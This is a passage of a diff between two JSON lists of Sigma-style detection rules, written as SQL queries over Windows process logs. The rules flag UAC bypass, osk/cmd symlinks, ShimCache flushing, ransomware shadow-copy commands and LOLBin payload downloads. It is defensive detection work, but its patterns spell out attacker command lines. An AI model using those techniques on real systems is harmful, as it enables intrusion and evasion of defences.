@sblmsrsn, @oscd_initiative", "tags": [ - "attack.execution", - "attack.t1204" + "attack.defense_evasion", + "attack.t1027.004" ], "falsepositives": [ - "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + "Utilization of this tool should not be seen in enterprise environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\vbc.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cvtres.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_snatch_ransomware.yml" + "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" }, { - "title": "UAC Bypass via Event Viewer", - "id": "be344333-921d-4c4d-8bb8-e584cf584780", + "title": "Suspicious Atbroker Execution", + "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", "status": "test", - "description": "Detects UAC bypass method using Windows event viewer", - "author": "Florian Roth (Nextron Systems)", + "description": "Atbroker executing non-deafualt Assistive Technology applications", + "author": "Mateusz Wydra, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate, non-default assistive technology applications execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr.yml" + "filename": "proc_creation_win_lolbin_susp_atbroker.yml" }, { - "title": "Audio Capture via SoundRecorder", - "id": "83865853-59aa-449e-9600-74b9d89a6d6e", - "status": "test", - "description": "Detect attacker collecting audio via SoundRecorder application.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Shell32 DLL Execution in Suspicious Directory", + "id": "32b96012-7892-429e-b26c-ac2bf46066ff", + "status": "experimental", + "description": "Detects shell32.dll executing a DLL in a suspicious directory", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1123" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate audio capture by legitimate user." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\SoundRecorder.exe' ESCAPE '\\' AND CommandLine LIKE '%/FILE%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_soundrecorder_audio_capture.yml" + "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" }, { - "title": "Application Whitelisting Bypass via Dxcap.exe", - "id": "60f16a96-db70-42eb-8f76-16763e333590", - "status": "test", - "description": "Detects execution of of Dxcap.exe", - "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "ShimCache Flush", + "id": "b0524451-19af-4efa-a46f-562a977f792e", + "status": "stable", + "description": "Detects actions that clear the local ShimCache and remove forensic evidence", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112" ], "falsepositives": [ - "Legitimate execution of dxcap.exe by legitimate user" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DXCap.exe' ESCAPE '\\' OR OriginalFileName = 'DXCap.exe') AND CommandLine LIKE '% -c %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_susp_dxcap.yml" + "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" }, { - "title": "Suspicious Add User to Remote Desktop Users Group", - "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", + "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", + "id": "e9b61244-893f-427c-b287-3e708f321c6b", "status": "experimental", - "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1133", - "attack.t1136.001", - "attack.t1021.001" + "attack.credential_access", + "attack.t1546.008" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" + "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" }, { - "title": "Service Registry Key Deleted Via Reg.EXE", - "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", + "title": "7Zip Compressing Dump Files", + "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", + "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_delete_services.yml" + "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" }, { - "title": "Equation Group DLL_U Export Function Load", - "id": "d465d1d8-27a2-4cca-9621-a800f37cf72e", - "status": "stable", - "description": "Detects a specific export function name used by one of EquationGroup tools", + "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", + "id": "75578840-9526-4b2a-9462-af469a45e767", + "status": "test", + "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.g0020", - "attack.defense_evasion", - "attack.t1218.011" + "attack.persistence", + "attack.t1136.001", + "cve.2021.35211" ], "falsepositives": [ "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%-export dll\\_u%' ESCAPE '\\' OR (CommandLine LIKE '%,dll\\_u' ESCAPE '\\' OR CommandLine LIKE '% dll\\_u' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml" + "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - Process", - "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", + "title": "Conti Volume Shadow Listing", + "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects a command used by conti to find volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1587.001", + "attack.resource_development" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" + "filename": "proc_creation_win_malware_conti.yml" }, { - "title": "Potential Exploitation Attempt From Office Application", - "id": "868955d9-697e-45d4-a3da-360cefd7c216", + "title": "Rorschach Ransomware Execution Activity", + "id": "0e9e6c63-1350-48c4-9fa1-7ccb235edc68", "status": "experimental", - "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", - "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", + "description": "Detects Rorschach ransomware execution activity", + "author": "X__Junior (Nextron Systems)", "tags": [ "attack.execution", + "attack.t1059.003", + "attack.t1059.001", "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\') AND CommandLine LIKE '%11111111%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" + "filename": "proc_creation_win_malware_rorschach_ransomware_activity.yml" }, { - "title": "Php Inline Command Execution", - "id": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", + "title": "System File Execution Location Anomaly", + "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", "status": "experimental", - "description": "Detects execution of php using the \"-r\" flag. This is could be used as a way to launch a reverse shell or execute live php code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a Windows program executable started from a suspicious folder", + "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Unknown" + "Exotic software" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR OriginalFileName = 'php.exe') AND CommandLine LIKE '% -r%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dashost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\defrag.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dwm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_php_inline_command_execution.yml" + "filename": "proc_creation_win_susp_system_exe_anomaly.yml" }, { - "title": "Suspicious Calculator Usage", - "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", - "status": "test", - "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", - "author": "Florian Roth (Nextron Systems)", + "title": "Use of VisualUiaVerifyNative.exe", + "id": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", + "status": "experimental", + "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate testing of Microsoft UI parts." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VisualUiaVerifyNative.exe' ESCAPE '\\' OR OriginalFileName = 'VisualUiaVerifyNative.exe'))" ], - "filename": "proc_creation_win_susp_calc.yml" + "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml" }, { - "title": "Suspicious VBScript UN2452 Pattern", - "id": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", + "title": "Suspicious Microsoft Office Child Process", + "id": "438025f9-5856-4663-83f7-52f878a70a50", "status": "test", - "description": "Detects suspicious inline VBScript keywords as used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", + "author": "Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.execution", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%CreateObject%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_unc2452_vbscript_pattern.yml" + "filename": "proc_creation_win_office_susp_child_processes.yml" }, { - "title": "Active Directory Structure Export Via Ldifde.EXE", - "id": "4f7a6757-ff79-46db-9687-66501a02d9ec", + "title": "Abusing IEExec To Download Payloads", + "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", "status": "experimental", - "description": "Detects the execution of \"ldifde.exe\" in order to export organizational Active Directory structure.", + "description": "Detects execution of the IEExec utility to download payloads", "author": "Nasreddine Bencherchali (Nextron Systems)", 